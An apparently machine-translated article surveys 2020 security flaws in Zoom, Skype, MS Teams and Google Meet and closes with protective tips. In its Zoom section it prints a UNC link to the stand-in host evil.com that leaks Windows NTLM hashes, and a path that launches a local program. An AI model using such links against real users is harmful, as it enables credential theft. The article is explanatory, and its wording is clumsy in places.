Video Services Security

Since the start of the pandemic, all video conferencing services have experienced explosive growth in the number of users:
• number of daily Skype users in just a month increased by 70%,
• the number of MS Teams users since January has grown 5 times and reached 75 million people,
• number of users Zoom for 4 months increased by 30 times and exceeded 300 million people a day,
• since January 2020, the number of daily users of the Google application (Hangout) Meet has grown 30 times and now stands at 100 million people


The increase in the value of Zoom Video shares since the pandemic began. Source: Investing.com

However, the mass demand caused not only stock growth, but also clearly demonstrated the problems with the security of services, which for some reason no one had thought of before. Some of the problems are related to the quality of programmers’ work and can lead to remote code execution. Others are based on incorrect architectural solutions that provide the opportunity for malicious use of the service.

Zoom

Zoom Video literally broke into the videoconferencing services market and quickly became a leader. Unfortunately, leadership was manifested not only in the number of users, but also in the number of errors detected. The situation was so depressing that the military and state departments of many countries forbade employees to use the problem product; large companies followed suit. Consider the Zoom vulnerabilities that caused these solutions.

Encryption Issues

Zoom declares that all video calls are protected by encryption, but in reality everything is not so beautiful: the service does use encryption, but the client program asks the session key from one of the servers of the “key management system” that is part of the Zoom cloud infrastructure. These servers generate an encryption key and give it to subscribers who connect to the conference – One key for all conference participants.

The key is transmitted from the server to the client through the TLS protocol, which is also used for https. If one of the conference participants uses Zoom on the phone, a copy of the encryption key will also be transferred to another Zoom telephony connector server.
Some of the key management system servers are located in China, and they are used to issue keys even when all conference participants are in other countries. There are justifiable fears that the PRC government may intercept encrypted traffic, and then decrypt it using keys received from providers on a voluntary basis.
Another encryption problem is related to its practical implementation:
• although the documentation states that 256-bit AES keys are used, their actual length is only 128 bits;
• AES algorithm works in ECB mode, when using which the encryption result partially preserves the structure of the source data.

The result of image encryption using ECB mode and other AES modes. Source: Wikipedia

500 thousand dollars vulnerability

In mid-April 2020, two zero-day vulnerabilities were discovered in Zoom clients for Windows and macOS. Windows Client RCE Vulnerability immediately put up for sale for 500 thousand US dollars. To take advantage of the error, the attacker must call the victim, or participate with her in the same conference.
Vulnerability in the macOS client did not give such opportunities, so its use in real attacks is unlikely.

Responses to unauthorized XMPP requests

At the end of April 2020, Zoom discovered another vulnerability: using a specially crafted XMPP request anyone could get a list of all service users belonging to any domain. For example, you could get a list of user addresses from the usa.gov domain by sending an XMPP request of the form:

The application simply did not check the domain of the user requesting the address list.

Take control of macOS

Zoom client for macOS detected two vulnerabilities that allowed an attacker to take control of a device.

1) Zoom installer used the shadow installation technique, which is often used by malicious programs to install without user interaction. A local, unprivileged attacker could inject malicious code into the Zoom installer and gain root privileges.
2) By injecting malicious code into the installed Zoom client, the attacker could gain access to the camera and microphone already provided to the application. No additional requests or notifications will be displayed.

UNC vulnerability in the Windows client

Discovered in Zoom client for Windows vulnerability could lead to leak of user credentials through UNC links. The reason is that the Zoom Windows client converts links to UNC paths, so if you send a link like \ evil.com img kotik.jpg to chat, Windows will try to connect to this site using the SMB protocol to open the file kotik.jpg. The remote site will receive a username and NTLM hash from the local computer, which can be cracked using the Hashcat utility or other tools.
Using this technique, one could run almost any program on the local computer. For example, the link 127.0.0.1 C $ windows system32 calc.exe will start the calculator.

Video Call Leaks

In the beginning of April Records of personal video calls of users of Zoom appeared on YouTube and Vimeo. These included school lessons, psychotherapy sessions and medical consultations, as well as corporate meetings.
The reason for the leak was that the service assigned videoconferences with open identifiers, and the conference organizers did not protect access to them with a password. Anyone could “merge” the notes and use them at their discretion.

Zombombing

This is the case when insufficient attention to the default security settings for conferences leads to sad consequences. To connect to any video call in Zoom, it was enough to know the identifier of the meeting, and prankers began to use it in large quantities. They burst into online lessons and practiced there in a peculiar “wit”, for example, started a screen demonstration with a porn movie or painted a document on the teacher’s screen with obscene images.
Then it turned out that the problem is much wider than just the disruption of online lessons. Journalists at The New York Times found private chats and threads on the Reddit and 4Chan forums, which participants held massive campaigns to disrupt public events, online meetings of alcoholic anonymous societies and other Zoom meetings. They looked for the details for connection published in the public domain, and then invited other trolls to join the “fun”.

Error handling

Massive refusals to use the service forced Zoom to take emergency measures. In his CNN interview in early April Zoom CEO Eric Yuan saidthat the company was moving too fast, so they made some mistakes. Having learned the lesson, they took a step back to focus on privacy and security.
In accordance with the program “90 days to safety”, Zoom On April 1, 2020, it stopped working on new features and began to troubleshoot identified problems and audit the code security.
The result of these measures was the release of Zoom version 5.0, which, among other things, upgraded AES encryption to 256 bits and implemented many other improvements related to default security.

Skype

Despite the rapid growth in the number of users, Skype appeared only once in the information security news of the current year, and even this was not due to the vulnerability. In January 2020, one of the former contractors told The Guardian that Microsoft for several years listened and processed the voices of users of Skype and Cortana without any security measures. However, for the first time this became known in August 2019, and even then Microsoft representatives explained that voice data collection is carried out to ensure and improve the operation of voice services: search and recognition of voice commands, speech translation and transcription.

The result of a search in the vulnerability database for Skype. Source: cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Skype

As for vulnerabilities, according to the CVE database, in 2020, no vulnerabilities were found in Skype.

Ms teams

Microsoft pays a lot of attention to the security of its products, including MS Teams (although the opposite opinion is widespread). The following vulnerabilities were discovered and fixed in Teams in 2019-2020:
1) CVE-2019-5922 – a vulnerability in the Teams installer, which allowed an attacker to slip him a malicious DLL and gain rights in the target system, since the installer did not check what the DLL was in his folder.
2) Vulnerability in the Microsoft Teams platform allowed to compromise a user account using a picture.

Scheme of attack on MS Teams using a picture. Source: www.cyberark.com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams

The source of the problem was how Teams works with image access tokens. Two tokens are used in the platform for user authentication: authtoken and skypetoken. Authtoken allows the user to upload images in the Teams and Skype domains and generates a skypetoken, which is used for authentication on the server that processes commands from the client, for example, reading or sending messages.
An attacker intercepting both tokens can make Teams API calls and gain full control over the account:
• read and send messages,
• create groups,
• add and remove users,
• change permissions.
To intercept, it was enough to lure the victim to a subdomain of the teams.microsoft.com domain controlled by an attacker using a GIF file. Then the victim’s browser will send the authtoken to the hacker, after receiving which he will be able to create a skypetoken.

3) Several vulnerabilities discovered by Tenable researchers. in the component for sending thank-you cards (Praise Cards) and chat windows, they allowed to implement a code for unauthorized changes in settings, as well as for the theft of user credentials. Microsoft did not issue separate recommendations for these problems, fixing them in the new version of the application.

Google meet

Unlike similar services, Google Meet fully works in a browser. Thanks to this feature, over the past two years, Google’s video conferencing has never been featured in information security news. Even the 30-fold increase in the number of users caused by the pandemic did not reveal vulnerabilities affecting their security.

Our recommendations

The use of any program requires a responsible attitude to security, and the means for video conferencing is no exception. Here are some rules to help protect your online meetings:
1) use the latest software,
2) download program installers only from official resources,
3) do not publish meeting IDs on the Internet,
4) protect your accounts with two-factor authentication,
5) only allow authorized users to connect to meetings,
6) close the possibility of new connections after the start of the event,
7) enable the organizer to block or delete the participants in the meeting,
8) Use modern anti-virus solutions that provide comprehensive protection against new and known threats.
Compliance with the rules of online hygiene for video conferencing will allow you to work efficiently and safely even in the most difficult periods.